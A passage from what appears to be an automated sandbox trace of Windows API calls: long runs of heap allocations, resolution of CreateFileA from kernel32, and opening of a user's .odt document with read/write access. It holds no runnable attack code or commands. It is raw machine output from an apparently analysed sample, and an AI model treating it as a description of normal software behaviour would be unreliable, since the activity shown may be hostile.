Flags=0x0, Size=0x10) returned 0x9ba180 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0179.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0179.959] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0179.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0179.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.962] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.965] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd870 [0179.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0179.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.965] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0179.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0179.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0179.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.966] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0179.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0179.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0179.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0179.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0179.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", cchWideChar=68, lpMultiByteStr=0x9aa4f8, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", lpUsedDefaultChar=0x0) returned 68 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.967] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\_--jwxd.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x88) returned 0x8feba8 [0179.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=68, lpWideCharStr=0x8feba8, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt") 